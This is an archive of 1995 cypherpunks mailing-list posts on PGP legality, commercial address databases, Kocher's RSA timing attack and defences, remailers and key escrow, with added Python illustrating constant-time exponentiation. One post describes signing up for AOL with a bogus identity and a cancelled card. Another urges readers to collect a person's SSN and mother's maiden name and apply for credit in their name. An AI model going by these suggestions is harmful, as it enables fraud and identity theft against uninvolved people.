From: marina kats <marina@commtouch.co.il>
Date: Fri, 15 Dec 1995 02:10:13 +0800
To: cypherpunks@toad.com
Subject: PGP Interoperability?
Message-ID: <9512141007.AA00520@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone out there vouch for the interoperability of PGP 2.6 ui with 
versions of PGP available in USA from MIT & Viacrypt.

What about the legal issue ?
Is it legal for a US citizen to encrypt or check signatures with a 2.6ui 
public key ?
Would sending a public key out of the US be regarded as export by ITAR?

Thanks
Geoff Klein.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Fri, 15 Dec 1995 05:35:35 +0800
To: turner@TeleCheck.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512142032.MAA17978@software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 PM 12/14/95 -0600, turner@TeleCheck.com wrote:
>

>Just think, with new and improved "interactive TV" you will be able to
>get commercials tailored to your purchasing habits (A doctor would get
>a commercial for an expensive car, while Joe Sixpacks would get the Ford
>Festiva).
>
>
I'm doing it now - software.net serves distinct ads to Mac, Windows, Text
and Unix based browsers.  

On the name database side the PO runs something called National Change of Address
which tracks who moved where and allows direct marketing companies to clean
their lists.  Almost everybody sells address change data (utilities, the PO,
credit companies) - I'm getting tons of "welcome to the neighbourhood" mail
since I moved.

John Pettitt
jpp@software.net
"why not, and who said so?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Dec 1995 05:56:43 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512142108.NAA03208@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 PM 12/14/95 -0600, you wrote:
>sandfort@crl.com said:
>> Something of privacy interest happened to me yesterday.  I phoned a 
>> company to ask for a copy of their catalog.  The phone clerk asked 
>> for my last name and zip code.  After receiving that info, the clerk 
>> asked me, "Is this your full name and address?" and then gave them 
>> both correctly.  I was taken aback.
>
> Taken aback?  It's only going to get worse in the future.  As Telcos, credit
>card companies, etc., start looking for new ways to make money I think 
>selling information about you will increase dramatically.

I'm in the process of moving and getting new phones, and Pac Bell asked me
if it was ok to send my Social Security Number to my long-distance carrier.
I told them "no, but you don't have my SSN anyway" "Oh, you're right, we don't;
can we have it" "No" "OK.  Would you be willing to give us your driver's license
number or another form of ID?  We've just started asking for this recently." 
"Is it required?" "No, it's optional, but I have to ask" "No, thanks"

Sounds like you're right about them getting into the info-selling business.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 15 Dec 1995 03:18:16 +0800
To: hallam@w3.org
Subject: Re: Kocher's RSA attack
In-Reply-To: <9512141640.AA22375@zorch.w3.org>
Message-ID: <199512141815.NAA26051@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Further to Roger's comments that modular multiplies in software probably do
> not allow the timing attacks.

I must disagree, software implementations of RSA can and probably do
allow the timing attacks.  It all depends on the modexp implementation.
Most implementations that I know of, when performing an x^y mod n will
require a squarings and b multiplies, where a is the number of bits in
y and b is the number of 1-bits in y.

You iterate through the bits of y.  For each bit you square x, and if
the bit is 1 you multiply it into an accumulator.  Paul's attack can
determine if this multiply is done or not, given perfect timing
conditions, in 2 ciphertexts per bit.  This CAN happen in software,
and it does in implementations like RSAREF.  In fact, I'm fairly sure
that PGP's MPILib would be subject to this attack if it weren't for
all the other randomness involved in PGP.

The point is that just because an implementation is in software does
not mean you should be sloppy in your protections against this attack.

We should change implementations, both in software and hardware, to
defeat this attack.  Making operations run in constant time seems to
be the best way to defeat this attack.

Yes, we should also look at other possible attacks.  Covert channels
in a workstation environment are important, but they have nothing to
do with Paul's particular attack.  It would be interesting to see how
one could use covert channels to gain the timing information needed to
make this attack, however.  I have a few ideas.

-derek
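
The square-and-multiply loop described in the message above, as an added Python example (not code from RSAREF, PGP's MPILib, or any poster): it counts modular operations to show that the multiply count equals the number of 1-bits in the exponent, next to a Montgomery ladder, a swapped-in technique the thread does not name, whose operation count depends only on the bit width. The modulus, base and exponents are constructed sample values, and the function names are hypothetical.

```python
"""Operation counts for binary modular exponentiation (added illustration)."""

# Constructed sample values, not taken from any real key.
SAMPLE_MODULUS = (2**61 - 1) * (2**31 - 1)
SAMPLE_BASE = 0x123456789ABCDEF
SAMPLE_EXPONENTS = [
    0x8000000000000001,  # 64 bits, two 1-bits
    0x80000000FFFFFFFF,  # 64 bits, thirty-three 1-bits
    0xFFFFFFFFFFFFFFFF,  # 64 bits, sixty-four 1-bits
]


def modexp_square_multiply(x, y, n):
    """Right-to-left binary x**y mod n, as described in the message.

    Returns (result, squarings, multiplies): one squaring per bit of y and
    one extra multiply only for each 1-bit, so the work tracks popcount(y).
    """
    acc, base = 1, x % n
    squarings = multiplies = 0
    while y > 0:
        if y & 1:
            acc = (acc * base) % n
            multiplies += 1
        base = (base * base) % n
        squarings += 1
        y >>= 1
    return acc, squarings, multiplies


def modexp_ladder(x, y, n, bits):
    """Montgomery ladder over a fixed bit width.

    Every bit costs exactly one multiply and one squaring whatever its value.
    Python's big-integer arithmetic and this if/else are not constant time;
    a real implementation would use a branch-free conditional swap. Only the
    fixed operation schedule is illustrated here.
    """
    r0, r1 = 1, x % n
    squarings = multiplies = 0
    for i in range(bits - 1, -1, -1):
        if (y >> i) & 1:
            r0 = (r0 * r1) % n
            r1 = (r1 * r1) % n
        else:
            r1 = (r0 * r1) % n
            r0 = (r0 * r0) % n
        multiplies += 1
        squarings += 1
    return r0, squarings, multiplies


def operation_profile(exponents, bits=64):
    """Run both algorithms on each exponent and collect their operation counts."""
    rows = []
    for y in exponents:
        res_a, sq_a, mul_a = modexp_square_multiply(SAMPLE_BASE, y, SAMPLE_MODULUS)
        res_b, sq_b, mul_b = modexp_ladder(SAMPLE_BASE, y, SAMPLE_MODULUS, bits)
        if res_a != res_b:
            raise AssertionError("the two algorithms disagree")
        rows.append({
            "result": res_a,
            "naive_squarings": sq_a,
            "naive_multiplies": mul_a,
            "ladder_ops": (sq_b, mul_b),
        })
    return rows


if __name__ == "__main__":
    for y, row in zip(SAMPLE_EXPONENTS, operation_profile(SAMPLE_EXPONENTS)):
        print(hex(y), row["naive_squarings"], row["naive_multiplies"], row["ladder_ops"])
```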




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 15 Dec 1995 03:32:00 +0800
To: stewarts@ix.netcom.com
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <01HYSRU3EHHW8Y4ZOH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 14-DEC-1995 03:22:12.75

>There are two different sets of relevant rules in the US - Post Office and
state.
The PO's primary interest is making sure you don't mind if they don't
forward your mail once you stop using the Commercial Mail Receiving Agent
(CMRA) and secondarily that you aren't committing fraud by using the mailbox,
sending people change-of-address notices, ripping off your creditors, and
skipping town.  California has a hopelessly dishonest law that just went
into effect in 1995, which pretends to be designed to protect consumers from
fraud by the 7 million small businesses in CA that use mailboxes,
and actually requires that _anybody_, business or not, who wants to rent
a mailbox must fill out the Post Office form and also appoint the PO or CMRA
as their agent for service of process and give them up-to-date True Addresses.
The PO, meanwhile, "usually wants" a California Driver's License plus another ID
to rent a box from them.  (I didn't have such a thing when I last rented a box,
and the PO hassled my mailbox company into asking for one when the new law
came out.)  After many attempts at calling the PO to get anybody
who knows the _official_ rules for what ID is required, I found a PO lawyer 
who told me the rules are in the "Domestic Mail Manual", which any
Postmaster has, so my next step is to look up one of those before I next get
a mailbox.

So maybe a random photo ID will work, such as your FooBar Consulting
Employee ID, and maybe it won't, depending on what state you live in and how
clueless your local Post Office bureaucrats are.
-----------------
	The more critical question is likely to be what the people at the local
MBE/whatever _think_ the rules are. When I last got a box (under my real name,
in case anyone's wondering), I seem to recall that they'd accept credit cards.
Once one has one box under a given name, this opens up the possibility of
getting a secured credit card to make future access easier. However, I believe
that they do want at least one form of photo ID; I can't remember just off what
their specifications were.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Fri, 15 Dec 1995 04:40:01 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.SUN.3.91.951214074025.13177C-100000@crl14.crl.com>
Message-ID: <9512141932.AA09881@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain




sandfort@crl.com said:
> C'punks,

> Something of privacy interest happened to me yesterday.  I phoned a 
> company to ask for a copy of their catalog.  The phone clerk asked 
> for my last name and zip code.  After receiving that info, the clerk 
> asked me, "Is this your full name and address?" and then gave them 
> both correctly.  I was taken aback.

 Taken aback?  It's only going to get worse in the future.  As Telcos, credit
card companies, etc., start looking for new ways to make money I think 
selling information about you will increase dramatically.

Just think, with new and improved "interactive TV" you will be able to
get commercials tailored to your purchasing habits (A doctor would get
a commercial for an expensive car, while Joe Sixpacks would get the Ford
Fiestiva).

> I have been at my new address for only a couple of months.  Prior to 
> that, I have been couch surfing for a year and a half.  Though I 
> called an 800 number, ANI had nothing to do with it since I was 
> calling from work.  It may have been from a database associated with 
> a credit reporting agency, a bank or a utility company, but I am not 
> aware of any of these being available on-line for  something as 
> mundane as requesting a consumer catalog.  The clerk  had no idea 
> where the info came from (or so he said).  Does  anyone know how this 
> trick was done?

You might be the victim of the CD-ROM phone-book people, but I doubt it
if you have a new address (the versions lag 6+ months).  Telcos like 
Southern Bell and South Western Bell are now offering directory lookup 
service to corporate customers on a per-lookup charge.  I think we signed 
on for our collections department to find delinquent individuals.

Perhaps even more frightening is that we now have access to account information
from the Star network.  With your I.D., we can do a hit to see if your 
account is still open, closed, overdrawn, or in good standing.  I wonder
how long it will be before it is repackaged giving account balances.

... be afraid...

>  S a n d y

> P.S.  If anyone is interested in helping to make an adult       film, 
> drop me a note.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Fri, 15 Dec 1995 03:21:17 +0800
To: hallam@w3.org
Subject: EMF loopholes and [Re: Kocher's RSA attack]
Message-ID: <v02130507acf621e14fbc@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



>
>A conclusion which might be reached is that smartcards should
>in future
>contain a timer which is started at the beginning of every cryptographic
>operation and a delay loop introduced to ensure that the time taken is always
>the same. The alternative of attempting to ensure that equal processing is
>spent on each cycle threatens an infinite regress into second and third order
>effects, eg frequency of page faults. Covert channel analysis is bad enough
>as it is.
>

I remember the first computer I built had a neat wireless "sound
card" built in. The radio waves generated by the processor could
be modified by choosing the instructions executed. So you could
get sound for your computer games by putting a radio next to
the machine! The delay loops for the games contained multiple
paths for different sounds. It was actually pretty good for the
time.

This leads me to believe that a delay loop might not be good
enough. The leakage from the smart card could be enough to
identify when the card entered the delay loop. The difference
between the signal could be significant.

Just a thought.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 15 Dec 1995 12:35:57 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.ULT.3.91.951214111209.5962K@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951214144159.12822D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

So far, no one has come up with anything stronger than speculation
about my database question.  Some "anonymous" told me how
easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
didn't give the guy my phone number.

On Thu, 14 Dec 1995, Rich Graves wrote:

> One of the easiest ways to get quick address changes is to subscribe to
> the US Postal Service's mail forwarding lists. They're advertised in 
> direct marketing magazines.

Fine, but I haven't put in any changes of address with the PO.

> Local and long distance phone companies probably sell telephone
> forwarding lists too. 

Yeah, maybe, but my original question was, "does anyone KNOW how 
the trick was done?                                     ^^^^


 S a n d y

P.S.  I'm not looking for movie makers, but for movie
      investors.  Jeez

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 08:44:27 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.SUN.3.91.951214171110.16699A-100000@rwd.goucher.edu>
Message-ID: <Pine.ULT.3.91.951214145617.8139B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Dec 1995, Jon Lasser wrote:

> On Thu, 14 Dec 1995, Rich Graves wrote:
> 
> > > I suspect Sameer would be happy to open an account paid in advance in
> > > small unmarked bills.  AOL probably wouldn't.
> > 
> > AOL will, however, accept a bogus name, address, and credit card number
> > (as long as the checksum is correct) for the initial ten free hours plus
> > however long it takes for the first bill to bounce. 
> 
> Nope.  Not anymore.  Due to excessive fraud, they now check the credit 
> card information when you first provide it.

They didn't check it very thoroughly last week. I think they just do some
kind of checksum or maybe an assigned-numbers list lookup; it's too fast
to be anything else. 

I signed up using an unsolicited credit card that was canceled before it
was ever activated. If any paper trail remains (I'd be curious to know
whether there is any, but please don't dig too deep), it should lead to a
nonexistent entity living at my work address (a general mail drop that 
is used by 50 different people). 

Of course I fully intend to terminate the AOL account, or less likely
correct the billing information, before the ten free hours runs out. If
they ever care to investigate, they'll find an email message from me to
myself explaining what happened. 

My AOL account names and the credit card number I used are on the Web.

- -rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNCrpI3DXUbM57SdAQHMcAQAxtvY0WDHDxzXibsVDDs/sQXpZ4kGBICe
hangYsce7hu/Zlp2A37rb0pyi2klCTjZ/QK3dOdNMEnrp2aTXpPmVrSqCVZ96oWr
0Vh40VJD2gNiWZVHzRHvRp9x8mx2VMQL7+qkGQXQgyvX7O8XuneqLGQZveqVF0kt
8KcZJU/0CzI=
=zls6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 08:52:49 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.SUN.3.91.951214144159.12822D-100000@crl.crl.com>
Message-ID: <Pine.ULT.3.91.951214150935.8139D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995, Sandy Sandfort wrote:

> > Local and long distance phone companies probably sell telephone
> > forwarding lists too. 
> 
> Yeah, maybe, but my original question was, "does anyone KNOW how 
> the trick was done?                                     ^^^^

If you give us your current and previous name, address, phone number,
credit card numbers, social security number, and a list of people you
communicate with, then we might be able to give you a more specific
answer. 

Otherwise, and probably even so, no. There's too many different ways to
invade your privacy for a third party to determine which particular
method was used. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 16 Dec 1995 15:49:51 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <m0tQMvq-00090LC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:22 PM 12/13/95 -0600, you wrote:
>>  The term "voluntary" implies (!) that people don't have to do
>>  something, right?  If that's really the case, then the escrow agent
>>  should have no obligation to do what is called "voluntary."
>
>Voluntary GAK means the system is voluntary for the USERS, not for the ESCROW  
>AGENTS.  What is the point of certifying escrow agents if they can still  
>thumb their noses at the LEAs?

I disagree.  The issue is one that might be called "standing."  Who,
exactly, is responsible to whom in such an arrangement?  Let's suppose key
escrow (for keys for non-exported encryption devices) is REALLY VOLUNTARY.
In that case, the escrow agent's only legal responsibility is to the owner
of the encryption device.  The government isn't a party to this voluntary
arrangement, and thus hasn't a complaint if the escrow agent refuses to comply.

I could, for example, enter into a voluntary arrangement with an escrow
agent so that he would be obligated to erase the key no more nor less than 5
days after he received it.  If he  did so 1 day after, and I needed the key,
he would have breached his obligation to ME, but not to the government.
Likewise, if he failed to erase the key, he would likewise be breaching his
agreement with me.

Unfortunately, I think you've fallen into the too-common trap of assuming
that the government can insist, unilaterally, on people's behavior even
absent laws which specifically require or prohibit specific performance.  

> The proposal is talking about throwing  
>CERTIFIED ESCROW AGENTS in jail for not complying with the authorities and  
>has absolutely nothing to do with users like you.

But you haven't established that an "escrow agent" has any duty to the
government.

>  I don't see how a system  
>where you don't have to register your keys but the escrow agents can be  
>imprisoned for not releasing a key in their possession is any less voluntary  
>to you.

It _is_ less voluntary, because it interferes with my right to escrow my key
with an organization that is willing to take the dispute to arbitrary levels
of uncooperativeness with the government.  I might insist, for example, that
the organization only store the key outside the country (beyond the reach of
US Courts) and require MY PERMISSION for them to release it to the
government.  I might also insist that they further encode the key so that
only an independent foreign organization (out of reach of US courts) could
provide the key to decrypt it.

If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary
restrictions should be do-able.


>Certainly the whole escrow thing is a sham and it couldn't possibly work if  
>it were really voluntary (witness the documents FOIA'ed from the FBI...). 

Yes but...

> We  
>all know that but there isn't anything sinister in the escrow agent  
>requirement for releasing keys under penalty of law 

Yes, there is.  I STILL refuse to accept the idea that a "key escrow agent"
(if he's keeping a VOLUNTARILY escrowed key, one not for export) must
automatically be considered to be subject to the  whim of government orders.  

>  Believe me, if we continue to have  
>voluntary GAK with no escrow agent requirements or certification when (if?)  
>Mandatory GAK comes down the escrow agent certification and penalties will  
>most definitely be part of the deal.  So I wouldn't worry about quibbling  
>over the voluntaryness just because of the proposed escrow agent  
>requirements.


Here's why you're wrong.  The government wants us to accept an arrangement
they've described as "voluntary."  (Naturally, we will refuse.)  It is
better to be able to show that we're refusing BECAUSE THEY'RE LYING about
the "voluntaryness" of the system, because that makes us appear reasonable
(which we are) and them appear unreasonable (which they are.)    Playing
along with their assertion that the system is "voluntary" would make
it look like it is we who are being unreasonable.

So the position I'll take is this:

"You claim you are willing to accept that the system be 'voluntary.'  Okay,
the only thing I'll tolerate is one which has the maximum number of
'voluntary' aspects.  Anything less and you're lying." 

I'd insist, for example, on the unfettered ability to turn off the key
escrow "feature" on the telephone (with a switch on the side, labelled "Good
encryption vs. Big Brother's listening").   I'd insist on its ability to talk
to other telephones which have to corresponding key escrow.

Etc, etc, etc.

If they resist, we can then say, "Oh, you must have been LYING about this
system being voluntary!  SO what else are you lying about?!?  I think you're
being unreasonable, so I have no intention of complying with ANY of your
requests, however reasonable they may appear to be on the surface, because I
cannot trust you!"

And _THAT_ would obviously be a reasonable position.  The key, however, is
that  we must expose the lying, and to do that we must use whatever
inconsistencies we can.  This is  not "quibbling":  It is establishing the
credibility (or lack of it) of THE ENEMY.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Thu, 14 Dec 1995 23:38:59 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <95Dec14.153934gmt+0100.53765@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Armadillo Remailer (remailer@armadillo.com) wrote:

>Simon Spero <ses@tipper.oit.unc.edu> writes:
>
>>My gut & scribble-on-the-back-of-a-napkin feeling about this class of
>>attack is that it could be a problem for smartcards (almost certainly)
>
>Is it a problem to create smartcards that do their calculations in
>fixed time? I'd guess it should be easier than on multi-purpose
>hardware.
>
>Does the attack work for existing smartcards?

At first glance, smart cards would seem to be the most critical target
to Kocher's timing attack since they usually operate in on-line
environments.

However, all RSA smart cards I'm aware of store the result of the
RSA computation (be it decryption, signing or authentication)
internally and it can only be read using a Get_Response command.

Of course this may not be satisfying since the terminal could get a
(noisy) measure of the time by repeatedly using this command to
see when the result is available.

Most smart cards do nevertheless require that the user must first
specify a PIN code before the RSA algorithms are operational.
This implies that even if the card gets stolen it can't be attacked
with Kocher's method.

/Lars Johansson
ljo@ausys.se
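
Added illustration, not code from anyone in this thread: a model of the two countermeasures discussed in the timing-attack messages above (padding every operation out to a fixed deadline with a delay loop, and doing the calculation itself on a fixed schedule). Operation counts stand in for time, and the modulus, base and exponents are constructed sample values.

```python
"""Model of the timing countermeasures discussed in the thread.

Each modular squaring, multiplication or idle delay step is recorded as one
entry in a trace. Trace length stands in for elapsed time; Python's own
big-integer arithmetic is not constant-time, so this is a model only.
"""

# Constructed sample values (assumptions, not taken from the thread).
MOD = 1000003
BASE = 65537
BITS = 16
LOW_WEIGHT_EXP = 0x8001   # two bits set
HIGH_WEIGHT_EXP = 0xFFFF  # sixteen bits set


def square_multiply(base, exp, mod):
    """Left-to-right square-and-multiply: multiplies only on 1 bits,
    so the number of steps depends on the secret exponent."""
    result, trace = 1, []
    for bit in bin(exp)[2:]:
        result = (result * result) % mod
        trace.append("S")
        if bit == "1":
            result = (result * base) % mod
            trace.append("M")
    return result, trace


def padded_square_multiply(base, exp, mod, deadline):
    """Timer plus delay loop: run the variable-time routine, then idle
    ("I") until a fixed deadline so the total is always the same."""
    result, trace = square_multiply(base, exp, mod)
    if len(trace) > deadline:
        raise ValueError("deadline is shorter than the worst case")
    return result, trace + ["I"] * (deadline - len(trace))


def montgomery_ladder(base, exp, mod, bits):
    """Fixed schedule: one multiply and one square for every bit position,
    including leading zeros. A real implementation would also replace the
    branch below with a branch-free conditional swap."""
    if exp >> bits:
        raise ValueError("exponent does not fit in the fixed bit length")
    r0, r1, trace = 1, base % mod, []
    for i in range(bits - 1, -1, -1):
        if (exp >> i) & 1:
            r0 = (r0 * r1) % mod
            r1 = (r1 * r1) % mod
        else:
            r1 = (r0 * r1) % mod
            r0 = (r0 * r0) % mod
        trace += ["M", "S"]
    return r0, trace


def busy_steps(trace):
    """Steps that are real arithmetic, as seen by an observer who can tell
    computation from the delay loop (for example by its emissions)."""
    return sum(1 for op in trace if op != "I")


def observe(exp):
    """What each variant exposes for one exponent."""
    _, plain = square_multiply(BASE, exp, MOD)
    _, padded = padded_square_multiply(BASE, exp, MOD, deadline=2 * BITS)
    _, ladder = montgomery_ladder(BASE, exp, MOD, BITS)
    return {
        "plain_total": len(plain),
        "padded_total": len(padded),
        "padded_busy": busy_steps(padded),
        "ladder_trace": "".join(ladder),
    }


if __name__ == "__main__":
    for exp in (LOW_WEIGHT_EXP, HIGH_WEIGHT_EXP):
        print(hex(exp), observe(exp))
```

With the padded variant the totals match but the busy/idle split still differs by exponent, which is the leak raised in the reply about the delay loop; the ladder's trace is identical for both exponents.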





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 15 Dec 1995 09:26:08 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
Message-ID: <199512150030.QAA24868@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



> I suspect Sameer would be happy to open an account paid in advance in
> small unmarked bills.  AOL probably wouldn't.

	I do this all the time..

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Fri, 15 Dec 1995 09:30:15 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <199512150033.QAA19950@software.net>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves wrote:

[ about AOL ]
>
>They didn't check it very thoroughly last week. I think they just do some
>kind of checksum or maybe an assigned-numbers list lookup; it's too fast
>to be anything else. 


It takes 6 seconds to pre-approve a card for $1 and do an AVS (Address
Verification).  If you don't have a dedicated line to your accepting bank it
takes ~25 seconds with the dial up.

Well within the time it takes AOL to validate an account.


John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065

Favorite quote: "Security is mostly a superstition. It does not 
exist in nature, nor do the children of man as a whole experience
it. Avoiding danger is no safer in the long run than outright
exposure. Life is either a daring adventure, or nothing." -  Helen Keller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Fri, 15 Dec 1995 07:43:22 +0800
To: Martin Janzen <janzen@idacom.hp.com>
Subject: Re: Jim Quinn interview of James Norman
Message-ID: <199512142348.RAA28682@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Wed, 13 Dec 1995 09:49:56 -0800
> From:          Martin Janzen <janzen@idacom.hp.com>
> To:            ecarp@netcom.com
> Subject:       Re: Jim Quinn interview of James Norman

> 
> This is the third time you've cross-posted this long and completely
> irrelevant message to Cypherpunks.  Please stop it!

No, sorry, I only ACCIDENTALLY cross-posted it *ONCE*.  Any other
posts you are seeing are NOT MY DOING.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Fri, 15 Dec 1995 08:19:32 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512142032.MAA17978@software.net>
Message-ID: <9512142259.AA21606@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



jpp@software.net said:
> I'm doing it now - software.net serves distinct ads to Mac, Windows, 
> Text and Unix based browsers.  
 
I checked.  It's nice, with a nice selection of products.  However, this
misses the point I didn't make in the first place -- should a company 
or a group of individuals be allowed to have access to information 
about you?  If so, where do you draw the line? How much is too much?

Another thought also occurred to me.  The thread that wouldn't die,
something about tracking people with metal detectors, currency, metallic
thread in currencies, etc... If you write a check at a TeleCheck merchant, 
(in most cases) we know it immediately.  Now take Visa, MasterCard,
Discover, American Express, they know when you use their cards, location
and all.  Now, you want to be totally anonymous and live on cash only, right?
If you cash a check at a TeleCheck merchant, guess what... 

What if through information brokering, or by government intervention it
became profitable to sell this information on a real-time basis?  What
ramifications would this have?  "I see here Mr. so-and-so that you bought
some fertilizer.  We also have receipts for gasoline, oil, and beef jerky. 
Would you mind coming with us?... we seem to be below our quota this 
month for bombing suspects..."

This really doesn't bother me all that much.  It's the possibility of fraud
and misuse that is possible.  The more information I have about *YOU*, the
easier it is for me to impersonate YOU.  Or at least cancel all of your
credit cards, and cause HaViC as the 3l33t3 D00dz say.

Ok, how about a real life demonstration...

Just this week, I called my bank to cancel an ATM card and order a VISA
cash card.  What did they need?  Social security number, my name, address,
account, and the maiden name of my mother.  Often they want less, but this
would be a good example.

Find someone you know.  And try to obtain the above information.  Just
for grins, try it.  Just remember to be creative, and remember, the 
government is your _friend_.  You may be surprised.  Better yet, start
applying for credit cards in this person's name.  It does count against them.

> On the name database side the PO runs something called National Change 
> of Address which tracks who moved where and allows direct marketing 
> companies to clean their lists.  Almost everybody sells address change 
> data (utilities, the PO, credit companies) - I'm getting tons of 
> "welcome to the neighbourhood" mail since I moved.

I got the same thing, complete with gift certificates to be used at 
the neighbourhood grocery stores.  I'm not complaining, although it is
annoying to go to the mail box to find the current issue of MSJ or DDJ
crumpled because the mail carrier had to stuff advertisements into the
overflowing mailbox.  

The funny thing is that when I lived with my parents I was named 
"Resident." 

> John Pettitt jpp@software.net "why not, and who said so?" 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 15 Dec 1995 07:09:50 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951214171110.16699A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995, Rich Graves wrote:

> > I suspect Sameer would be happy to open an account paid in advance in
> > small unmarked bills.  AOL probably wouldn't.
> 
> AOL will, however, accept a bogus name, address, and credit card number
> (as long as the checksum is correct) for the initial ten free hours plus
> however long it takes for the first bill to bounce. 

Nope.  Not anymore.  Due to excessive fraud, they now check the credit 
card information when you first provide it.

(This made it impossible for a client to subscribe on the day 
after Thanksgiving, because AOL couldn't get through to the credit 
verification through all the shoppers...)

For any nontrivial denomination, this leads me to believe that ecash will 
be verified when online, not offline later.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
